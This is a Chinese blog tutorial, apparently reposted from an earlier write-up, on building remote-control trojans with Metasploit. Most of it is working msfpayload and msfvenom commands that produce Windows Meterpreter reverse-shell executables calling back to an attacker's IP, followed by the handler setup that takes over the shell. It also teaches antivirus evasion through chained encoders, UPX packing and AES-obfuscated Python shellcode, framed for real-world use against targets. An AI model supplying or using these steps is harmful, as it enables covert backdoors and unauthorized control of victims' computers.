Metasploit之我的远程控制软件

颓废 2019年5月19日10:20:00评论763 views字数 3903阅读13分0秒阅读模式

Metasploit之我的远程控制软件
参考文献:http://www.evil0x.com/posts/838.html(Metasploit 渗透测试笔记(Meterpreter篇))

远程控制软件-->远控后门木马程序

木马程序-->控制端(攻击者)-->服务端(攻击目标)

测试环境:
攻击者:kali-linux    -->192.168.2.146
受害者:Windows07     -->192.168.2.107

------------------------------------------------------------------------------------------------
(一)以下为kali-linux-1.0系统下的生成与连接方式(使用msfpayload命令的)
参考文献:http://jingyan.baidu.com/article/6b97984dbee2881ca2b0bf33.html
免杀Payload生成:https://my.oschina.net/u/1585857/blog/500183

首先在我们的kali-linux下生成一个木马程序,需要设置连接我们的IP和端口

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=44444 X >test.exe

命令解释:
msfpayload                          -->生成木马/文件的命令
windows/meterpreter/reverse_tcp    -->(生成)这样的一个木马程序
LHOST=192.168.2.146                -->设置本地IP地址
LPORT=44444                        -->设置本地端口
X                                  -->选用二进制方式
>                                  -->写入,举例:echo 1>test.txt(将“1”写入文本)
test.exe                           -->生成的木马程序名字

这样生成的木马文件在当前系统目录下test.exe

之后在metasploit下连接后门程序,步骤如下:

msfconsole-->开启metasploit

use exploit/multi/handler  -->使用“exploit/multi/handler”这个模块连接后门程序

show options   -->查看需要设置的配置信息//这里其实不需要配置任何信息的

set PAYLOAD windows/meterpreter/reverse_tcp    -->使用tcp反向连接

show options  -->查看需要设置的配置信息

set LHOST=192.168.2.146    -->设置我们攻击者自己的连接IP

set LPORT=44444            -->设置我们攻击浙自己的连接端口

exploit                    -->执行连接,等待木马执行后连接

PS:连接成功后可以直接“shell”命令拿下shell

------------------------------------------------------------------------------------------------
(二)以下为kali-linux-2.0系统下的生成与连接方式(使用msfvenom命令的)
参考文献:http://www.77169.com/hack/201602/224112.shtm
类似文献:http://www.i0day.com/1173.html

msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的ip LPORT=你的端口 -f exe -o payload.exe

以上就是基本命令,解释一下,-p后面是payload名称,然后是你的ip和端口(payload参数),然后是-f 格式,由于是实验就先设置exe,然后-o payload.exe指保存为payload.exe。当然,实验的时候可以把格式设置成exe,但是实战的时候毕竟有杀毒软件,所以格式最好是jar(要求对方有java环境,可以用来拿java web网站的时候使用),或者设置成python然后自行shellcode免杀(用Python容器),然后用AES混淆Python代码,再用pyinstaller编译exe,这是目前最完美的过杀毒软件方案,就连勒索软件都不会被杀毒软件干掉,除非有特殊动作(比如修改注册表)。当然,楼主还有很多要学习。

具体步骤如下:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=44444 -f exe -o test.exe            -->在当前目录下生成木马程序test.exe,PS:生成payload.exe不会被杀,test.exe被秒杀

PS:之后的操作步骤是和上面的一样的↓

之后在metasploit下连接后门程序,步骤如下:

msfconsole                                     -->开启metasploit

use exploit/multi/handler           -->使用“exploit/multi/handler”这个模块连接后门程序

show options   -->查看需要设置的配置信息//这里其实不需要配置任何信息的

set PAYLOAD windows/meterpreter/reverse_tcp    -->使用tcp反向连接

show options               -->查看需要设置的配置信息

set LHOST=192.168.2.146    -->设置我们攻击者自己的连接IP

set LPORT=44444            -->设置我们攻击浙自己的连接端口

exploit                    -->执行连接,等待木马执行后连接

PS:连接成功后可以直接“shell”命令拿下shell

------------------------------------------------------------------------------------------------
(三)在BT5系统下的生成与连接方式(使用msfvenom命令的)
参考文献:http://www.i0day.com/1173.html

PS:没有环境,不做测试。
因为BT5下也是运用msfvenom命令,所以和kali-linux-2.0的步骤是一样的,区别就是使用模块不一样

以下是文章复制文本

一,目的:熟悉msfvenom生成木马程序过程,并执行和监听控制.

二,工具:MSF

三,原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线

四,过程:

1,查看帮助

命令: root# msfvenom -h

结果:

2,生成meterpreter payload 并利用shikata_ga_nai编码,查看所需选项,利用 -o参数

命令: root# msfvenom -p windows/meterpreter/reverse_tcp -o

结果:

3,现在设置LHOST,即监听主机IP和LPORT监听端口,我是本地局域网测试,所以IP是192.168.1.113,端口设置成443.所以最后连接会通向192.168.1.113的443端口

命令: root# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘/x00’ LHOST=192.168.1.113 LPORT=443 -f exe > abc.exe

注:如果只是用msfpayload生成,简单示例:

命令: root # msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.113 X > Desktop/abc.exe

多次生成可进行免杀:msfpayload windows/shell_reverse_tcp lhost=192.168.128.129 lport=888 r| msfencode -e x86/shikata_ga_nai -c 7 -t raw | msfencode -e x86/alpha_upper -c 3 -t raw | msfencode -e x86/shikata_ga_nai -c 6 -t raw | msfencode -e x86/alpha_upper -c 3 -t exe -o /root/Desktop/acn.exe

upx加壳:upx -5 /root/Desktop/acn.exe

结果:

说明:  -p payload

-e 编码方式

-i 编码次数

-b 在生成的程序中避免出现的值

LHOST,LPORT 监听上线的主机IP和端口

-f exe 生成EXE格式

4,把生成的abc.exe放到win7下.执行.

5,在命令行下,打开msfconsole.

命令: root # msfconsole

6,本机监听,因为之前用的是reverse_tcp,所以设置如下

命令: msf > use exploit/multi/handler

Msf exploit(handler) > set payload windows/meterpreter/reverset_tcp

结果:

7,现在快完成了,设置LHOST,LPORT,并执行exploit,会发现有连接进来.

8,.验证

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
颓废
  • 本文由 发表于 2019年5月19日10:20:00
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Metasploit之我的远程控制软件http://cn-sec.com/archives/67390.html

发表评论

匿名网友 填写信息